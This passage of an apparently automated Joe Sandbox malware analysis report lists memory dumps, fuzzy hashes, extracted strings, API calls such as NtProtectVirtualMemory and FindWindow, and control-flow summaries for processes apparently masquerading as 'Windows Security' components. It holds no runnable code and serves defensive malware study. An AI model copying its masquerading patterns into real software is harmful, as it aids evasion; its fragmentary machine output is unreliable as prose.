                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6434be81371f3e021254ff1ed27823c3eee6c5d389afc6c4011f9ebe23d9aff0
                                                    • Instruction ID: 5624b8fc71769a54c79f3abe449564087ccc362d81b05bf1cd4f072636302ab4
                                                    • Opcode Fuzzy Hash: 6434be81371f3e021254ff1ed27823c3eee6c5d389afc6c4011f9ebe23d9aff0
                                                    • Instruction Fuzzy Hash: FFF027B17002081BE3406B64D0483ABB7A6CFC471CF14C12ED60A47385CE393D06CBD1
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 887973f8586d75f0bd5b57929206fabbbe470842809c0c3280c985c9dc81ed5c
                                                    • Instruction ID: 9a58f714a0363aec067556788cbb3d2db7fda4f5cfe994d203fd5c1d05cdc1eb
                                                    • Opcode Fuzzy Hash: 887973f8586d75f0bd5b57929206fabbbe470842809c0c3280c985c9dc81ed5c
                                                    • Instruction Fuzzy Hash: 3EE06D753001008F83149B1DE894C6ABBEAEFCE61131A10AEE545CB730CF21EC028B90
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0d8acb05398f376c0fc1fc31c93076f9f968c99d6c545c6162154c7d59d23817
                                                    • Instruction ID: c0a15190a209b882ad13d23ba31eeb115cec389954c167653623539c70716484
                                                    • Opcode Fuzzy Hash: 0d8acb05398f376c0fc1fc31c93076f9f968c99d6c545c6162154c7d59d23817
                                                    • Instruction Fuzzy Hash: 08E06D753001008F83049B1DE894C2AB7EAEFCE61131A10AEE545CB330CB21EC028B80
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6358cf8fe56a81afe7484d50743b7bc3641180e0c4c3545ac09665b31cc86c58
                                                    • Instruction ID: c6ee77ef903ab0d36c98135a8dd8a16f90a4d99a0832cd5e5c8889fb4bec2266
                                                    • Opcode Fuzzy Hash: 6358cf8fe56a81afe7484d50743b7bc3641180e0c4c3545ac09665b31cc86c58
                                                    • Instruction Fuzzy Hash: DAF06D709017144FD3609FB8D4DC3AABBE5FB44314F00482DE10ED7341DB3968408B91
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 249e96c0a73ec6550e1345563528aa58e379c5dfbc8dde5a3f06d575879de40e
                                                    • Instruction ID: b81865f1843305afe5a3b272925637da734de909815e62095a5db122d5eb35b0
                                                    • Opcode Fuzzy Hash: 249e96c0a73ec6550e1345563528aa58e379c5dfbc8dde5a3f06d575879de40e
                                                    • Instruction Fuzzy Hash: 1BD02B23718299179B0A822FAC205573FDBCFD6A1031DC0BEF108CB340ED16EC024791
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5f18e3551ce2fcfefc307b9c55f240ae036adfb1c6165c21f1af380dce405c53
                                                    • Instruction ID: 462f455899c195059d4bbd6d754866bb3b3efbbdf7a2a4ed52ff2cf4b936d9a2
                                                    • Opcode Fuzzy Hash: 5f18e3551ce2fcfefc307b9c55f240ae036adfb1c6165c21f1af380dce405c53
                                                    • Instruction Fuzzy Hash: 7BE0ED709017144FD7649F78D4DC3AABBE5FB84314F00486DE15ED7241DB3969418B51
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cf04152b8ae55882c9d9cdee188aca9f1e98e99ce1cd75d0b851b09f5f710c2f
                                                    • Instruction ID: 85740807313b1a9afef5ff7b8448dedcdc328bb44eda13df74754f63b864db68
                                                    • Opcode Fuzzy Hash: cf04152b8ae55882c9d9cdee188aca9f1e98e99ce1cd75d0b851b09f5f710c2f
                                                    • Instruction Fuzzy Hash: 1FE08C31300A14178625666EB821AAF7BDADFC46A1315803EE51D87B00DF68ED068BE6
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f6213b41f78a288361b32a6e1d7e939edcbebe8bd5068ef01715306caafe36e
                                                    • Instruction ID: adf30c6545241a36af1a4426693fdce4806c185558eb9890e1a1db33bd063c26
                                                    • Opcode Fuzzy Hash: 0f6213b41f78a288361b32a6e1d7e939edcbebe8bd5068ef01715306caafe36e
                                                    • Instruction Fuzzy Hash: 95E08635B00114A78B0895A9E9514E9FBA5DBCC220F04847FDD0AA7740EF32691686E1
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ffdbd8488750f2eaaae705bba407396e2730903a3a0569b95d341e471980cdc
                                                    • Instruction ID: 7e06b25c50fa67095c38be82460babdb0ed3e48fb6617add11cbdae9e0df7cc2
                                                    • Opcode Fuzzy Hash: 4ffdbd8488750f2eaaae705bba407396e2730903a3a0569b95d341e471980cdc
                                                    • Instruction Fuzzy Hash: 4EE04F36304A145BEB0927B5E85C2AEBA56EBD476DF00402DE50A87342CF7D690183DA
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6a4aa4e03cb21f703c9040f191df3a1ad267bf764331136f69abe65b4e182caf
                                                    • Instruction ID: 953855209d1aefce76bc5c9309bc5539b550ff891df1f232bc1d9a0b8a4f76e5
                                                    • Opcode Fuzzy Hash: 6a4aa4e03cb21f703c9040f191df3a1ad267bf764331136f69abe65b4e182caf
                                                    • Instruction Fuzzy Hash: FEE08C31300A14178615666EB820A5F77DADFC46A1315803EE51D87700DF68ED068BD5
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                    • Instruction ID: 50bd060ceb7ad16b7936bcce304401827b72ecd753351a2aa12abcb10c8e66e9
                                                    • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                    • Instruction Fuzzy Hash: 19E08631B00114978B089599E9504D9F7A5DBCC220F04847EDD0AA7340EF32691686E1
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a59d7fec2c9a2ae1ff4e1d21fa72b742cece8c134d6ace88f5a5e27a9009d947
                                                    • Instruction ID: 3546a98c14845fe32ea7ce74bc90805e656d89987d946c7f2cf88e528427ab1a
                                                    • Opcode Fuzzy Hash: a59d7fec2c9a2ae1ff4e1d21fa72b742cece8c134d6ace88f5a5e27a9009d947
                                                    • Instruction Fuzzy Hash: D5D05E923101661B265430AB1CC16BBD2CF8ED84A6B0A007E9B09C7642EF40EC0103E1
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3522a614fcdf6034f36eeb0ef9b350eea7b25d1aac713af4cf2c127cba723cc9
                                                    • Instruction ID: 2d2a375463665929b575e59a3852fd7fc48f12f32561a3245d1f0adc79c5884f
                                                    • Opcode Fuzzy Hash: 3522a614fcdf6034f36eeb0ef9b350eea7b25d1aac713af4cf2c127cba723cc9
                                                    • Instruction Fuzzy Hash: 3DD0C7A27100661F265475BE2CD16FBC3CB8EE855770A417E9B09C7641DF40DC0143E1
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5c869421de82d0d289fa8339095451cce10e25cd710a1cfcf3d3562b1277e326
                                                    • Instruction ID: 85792e7d01e0887ed2c4dfda05c54221605024837652a8cd22130f8b3448cc96
                                                    • Opcode Fuzzy Hash: 5c869421de82d0d289fa8339095451cce10e25cd710a1cfcf3d3562b1277e326
                                                    • Instruction Fuzzy Hash: FDE01270D042599FC740DFB888515AAFFF0EB09204F2485AED95CD7211E2319602CF91
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                    • Instruction ID: 77edfbf27c4149158c7d835d8a389d17c80aa9a51e7cc4fe0b07952cac1d3fd0
                                                    • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                    • Instruction Fuzzy Hash: D5D042B0D042099F8784EFA9894166EFBF5AB59200B6085AA8919E7251E7329A128BD1
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2245304363.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_4570000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fbq$84Kl$84Kl$`Q]q$`Q]q$`Q]q$`Q]q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                    • API String ID: 0-2892487482
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,aq$0o@p$$]q$$]q$$]q$$]q$$]q$$]q
                                                    • API String ID: 0-3294546130
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0o@p$0o@p$0o@p$$]q$$]q
                                                    • API String ID: 0-4161401491
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: tMMl$`^q$`^q$`^q$`^q
                                                    • API String ID: 0-369650739
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: tMMl$`^q$`^q$`^q$`^q
                                                    • API String ID: 0-369650739
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2245304363.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_4570000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q$4']q$$]q$$]q
                                                    • API String ID: 0-978391646

                                                    Execution Graph

                                                    Execution Coverage:24.6%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:5
                                                    Total number of Limit Nodes:1
                                                    execution_graph 1659 7ff848f43dbe 1661 7ff848f43def 1659->1661 1660 7ff848f43f5b 1661->1660 1662 7ff848f440e4 NtProtectVirtualMemory 1661->1662 1663 7ff848f44125 1662->1663

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.2477533962.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_21_2_7ff848f40000_Windows Security Health Service.jbxd
                                                    Similarity
                                                    • API ID: MemoryProtectVirtual
                                                    • String ID: HAH$HAH$cR_H
                                                    • API String ID: 2706961497-754075854

                                                    Execution Graph

                                                    Execution Coverage:8.5%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:48
                                                    Total number of Limit Nodes:6
                                                    execution_graph 11709 2b8e208 11710 2b8e21d 11709->11710 11714 2b8e230 11710->11714 11718 2b8da28 11710->11718 11713 2b8da28 OleInitialize 11715 2b8e26f 11713->11715 11715->11714 11723 2b8dafc 11715->11723 11717 2b8e31c 11720 2b8da33 11718->11720 11719 2b8e23e 11719->11713 11719->11714 11720->11719 11721 2b8dafc OleInitialize 11720->11721 11722 2b8e31c 11721->11722 11724 2b8db07 11723->11724 11725 2b8e633 11724->11725 11727 2b8db18 11724->11727 11725->11717 11728 2b8e668 OleInitialize 11727->11728 11729 2b8e6cc 11728->11729 11729->11725 11730 2b80848 11731 2b80852 11730->11731 11733 2b821b3 11730->11733 11734 2b821d5 11733->11734 11738 2b822af 11734->11738 11742 2b822c0 11734->11742 11740 2b822c0 11738->11740 11739 2b823c4 11740->11739 11746 2b81980 11740->11746 11744 2b822e7 11742->11744 11743 2b823c4 11743->11743 11744->11743 11745 2b81980 CreateActCtxA 11744->11745 11745->11743 11747 2b83350 CreateActCtxA 11746->11747 11749 2b83413 11747->11749 11691 2b8c110 11692 2b8c16c FindWindowExA 11691->11692 11694 2b8c25f 11692->11694 11695 2b8d5f0 11696 2b8d636 GetCurrentProcess 11695->11696 11698 2b8d688 GetCurrentThread 11696->11698 11699 2b8d681 11696->11699 11700 2b8d6be 11698->11700 11701 2b8d6c5 GetCurrentProcess 11698->11701 11699->11698 11700->11701 11702 2b8d6fb 11701->11702 11703 2b8d723 GetCurrentThreadId 11702->11703 11704 2b8d754 11703->11704 11705 2b8bbd0 11707 2b8bc25 FindWindowA 11705->11707 11708 2b8bd14 11707->11708 11750 2b8dc40 DuplicateHandle 11751 2b8dcd6 11750->11751

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 294 2b8d5b0-2b8d67f GetCurrentProcess 301 2b8d688-2b8d6bc GetCurrentThread 294->301 302 2b8d681-2b8d687 294->302 303 2b8d6be-2b8d6c4 301->303 304 2b8d6c5-2b8d6f9 GetCurrentProcess 301->304 302->301 303->304 306 2b8d6fb-2b8d701 304->306 307 2b8d702-2b8d71a 304->307 306->307 318 2b8d71d call 2b8dfa8 307->318 319 2b8d71d call 2b8dbae 307->319 310 2b8d723-2b8d752 GetCurrentThreadId 311 2b8d75b-2b8d7bd 310->311 312 2b8d754-2b8d75a 310->312 312->311 318->310 319->310
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 02B8D66E
                                                    • GetCurrentThread.KERNEL32 ref: 02B8D6AB
                                                    • GetCurrentProcess.KERNEL32 ref: 02B8D6E8
                                                    • GetCurrentThreadId.KERNEL32 ref: 02B8D741
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 320 2b8d5f0-2b8d67f GetCurrentProcess 324 2b8d688-2b8d6bc GetCurrentThread 320->324 325 2b8d681-2b8d687 320->325 326 2b8d6be-2b8d6c4 324->326 327 2b8d6c5-2b8d6f9 GetCurrentProcess 324->327 325->324 326->327 329 2b8d6fb-2b8d701 327->329 330 2b8d702-2b8d71a 327->330 329->330 341 2b8d71d call 2b8dfa8 330->341 342 2b8d71d call 2b8dbae 330->342 333 2b8d723-2b8d752 GetCurrentThreadId 334 2b8d75b-2b8d7bd 333->334 335 2b8d754-2b8d75a 333->335 335->334 341->333 342->333
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 02B8D66E
                                                    • GetCurrentThread.KERNEL32 ref: 02B8D6AB
                                                    • GetCurrentProcess.KERNEL32 ref: 02B8D6E8
                                                    • GetCurrentThreadId.KERNEL32 ref: 02B8D741
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 940 2b8c110-2b8c178 942 2b8c17a-2b8c184 940->942 943 2b8c1b1-2b8c1d1 940->943 942->943 944 2b8c186-2b8c188 942->944 948 2b8c20a-2b8c25d FindWindowExA 943->948 949 2b8c1d3-2b8c1dd 943->949 946 2b8c18a-2b8c194 944->946 947 2b8c1ab-2b8c1ae 944->947 950 2b8c198-2b8c1a7 946->950 951 2b8c196 946->951 947->943 959 2b8c25f-2b8c265 948->959 960 2b8c266-2b8c29e 948->960 949->948 952 2b8c1df-2b8c1e1 949->952 950->950 953 2b8c1a9 950->953 951->950 954 2b8c1e3-2b8c1ed 952->954 955 2b8c204-2b8c207 952->955 953->947 957 2b8c1ef 954->957 958 2b8c1f1-2b8c200 954->958 955->948 957->958 958->958 961 2b8c202 958->961 959->960 965 2b8c2ae-2b8c2b2 960->965 966 2b8c2a0-2b8c2a4 960->966 961->955 967 2b8c2c2 965->967 968 2b8c2b4-2b8c2b8 965->968 966->965 969 2b8c2a6-2b8c2a9 call 2b80224 966->969 973 2b8c2c3 967->973 968->967 970 2b8c2ba-2b8c2bd call 2b80224 968->970 969->965 970->967 973->973
                                                    APIs
                                                    • FindWindowExA.USER32(?,?,?,?), ref: 02B8C24D
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 906 2b8c106-2b8c178 908 2b8c17a-2b8c184 906->908 909 2b8c1b1-2b8c1d1 906->909 908->909 910 2b8c186-2b8c188 908->910 914 2b8c20a-2b8c20f 909->914 915 2b8c1d3-2b8c1dd 909->915 912 2b8c18a-2b8c194 910->912 913 2b8c1ab-2b8c1ae 910->913 916 2b8c198-2b8c1a7 912->916 917 2b8c196 912->917 913->909 922 2b8c219-2b8c25d FindWindowExA 914->922 915->914 918 2b8c1df-2b8c1e1 915->918 916->916 919 2b8c1a9 916->919 917->916 920 2b8c1e3-2b8c1ed 918->920 921 2b8c204-2b8c207 918->921 919->913 923 2b8c1ef 920->923 924 2b8c1f1-2b8c200 920->924 921->914 925 2b8c25f-2b8c265 922->925 926 2b8c266-2b8c29e 922->926 923->924 924->924 927 2b8c202 924->927 925->926 931 2b8c2ae-2b8c2b2 926->931 932 2b8c2a0-2b8c2a4 926->932 927->921 933 2b8c2c2 931->933 934 2b8c2b4-2b8c2b8 931->934 932->931 935 2b8c2a6-2b8c2a9 call 2b80224 932->935 939 2b8c2c3 933->939 934->933 936 2b8c2ba-2b8c2bd call 2b80224 934->936 935->931 936->933 939->939
                                                    APIs
                                                    • FindWindowExA.USER32(?,?,?,?), ref: 02B8C24D
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: f568a3c5f2e501d73bfa0e6e5e0cad5f50c873c3ef9b6192782c3e5a2d4ad856
                                                    • Instruction ID: bf31f002e6a542b8da9da267fce634529de1811b4e9b426678f4b656fae9e517
                                                    • Opcode Fuzzy Hash: f568a3c5f2e501d73bfa0e6e5e0cad5f50c873c3ef9b6192782c3e5a2d4ad856
                                                    • Instruction Fuzzy Hash: D05166B1E002499FDB14EFE9C9817ADBBF1FF48700F14816AE859A7294DB749841CF92

                                                    Control-flow Graph

                                                    • Control-flow graph (rendered figure; node data not reproduced): basic blocks 2b8bbc4 to 2b8bd78, calling FindWindowA and the internal routine at 2b80224
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: 872689118209e6ddf8cfcf944b8781e03a6a247bef985143b446504b91d655eb
                                                    • Instruction ID: bcb9b0c4759a189f0bee6f2c5fbe79dd7bc5b33cb349a6f23852c2acbd25458a
                                                    • Opcode Fuzzy Hash: 872689118209e6ddf8cfcf944b8781e03a6a247bef985143b446504b91d655eb
                                                    • Instruction Fuzzy Hash: 63516AB1D006599FDB10EFA8C88579EBBF1FF48318F148569E818EB254DB749881CF81

                                                    Control-flow Graph

                                                    • Control-flow graph (rendered figure; node data not reproduced): basic blocks 2b8bbd0 to 2b8bd78, calling FindWindowA and the internal routine at 2b80224
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_24_2_2b80000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: FindWindow
                                                    • String ID:
                                                    • API String ID: 134000473-0
                                                    • Opcode ID: 340d3fddd003b41889f2a0bf36a02cc72e304670a7c6fa0dd03bbd7d065445a9
                                                    • Instruction ID: c46730bbc81af0a4462bcf9f5f35be8f7b346fb6e358119a3aa6d6f020ea8bf1
                                                    • Opcode Fuzzy Hash: 340d3fddd003b41889f2a0bf36a02cc72e304670a7c6fa0dd03bbd7d065445a9
                                                    • Instruction Fuzzy Hash: 365148B1D006599FDB10EFA9C885B9EBBF1FF48318F148569E818E7254DBB49881CF81

                                                    Control-flow Graph

                                                    • Control-flow graph (rendered figure; node data not reproduced): basic blocks 2b83347 to 2b83499, calling CreateActCtxA
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02B83401
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2477335988.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
